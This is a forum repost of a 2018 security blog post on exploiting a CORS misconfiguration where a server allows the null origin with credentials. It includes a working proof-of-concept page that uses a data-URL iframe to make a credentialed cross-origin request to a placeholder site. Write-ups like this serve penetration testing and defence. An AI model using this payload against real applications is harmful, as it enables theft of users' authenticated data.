Nytro Posted April 23, 2018 Report Posted April 23, 2018 Monday, 23 April 2018 Exploiting misconfigured CORS Null Origin Almost two years ago, in October 2016, James Kettle published an excellent blog post about the various types of Cross-Origin Resource Sharing (CORS) misconfigurations and how they can be exploited. Recently, I encountered a web application that allowed for two-way interaction with the so-called null origin. More precisely, when sending an HTTP request specifying the header: Origin: null the server would respond with the following two HTTP headers: Access-Control-Allow-Origin: null Access-Control-Allow-Credentials: true This configuration allows us to issue arbitrary requests to the application as long as we can set the Origin header to null. According to Kettle's blog post, it can be exploited by issuing the request from within an iframe using a data-url as follows: <iframe sandbox="allow-scripts allow-top-navigation allow-forms" src='data:text/html,<script>*cors stuff here*</script>'></iframe> Although the code above gives a hint to the right direction, it falls short of a complete proof of concept. I struggled to find code that would work across the browsers Chrome and Firefox, but eventually succeeded with the following snippet: <html> <body> <iframe src='data:text/html,<script> var xhr = new XMLHttpRequest(); xhr.open("GET", "https://vuln-app.com/confidential", true); xhr.withCredentials = true; xhr.onload = function () { if (xhr.readyState === xhr.DONE) { console.log(xhr.response); } }; xhr.send(null); </script>'></iframe> </body> As soon as the page from above is opened, a request to https://vuln-app.com/confidential should be issued with an Origin: null HTTP header and the correspoding HTTP response should be shown in the browser console. Sursa: https://www.soffensive.com/2018/04/exploiting-misconfigured-cors-null.html Quote
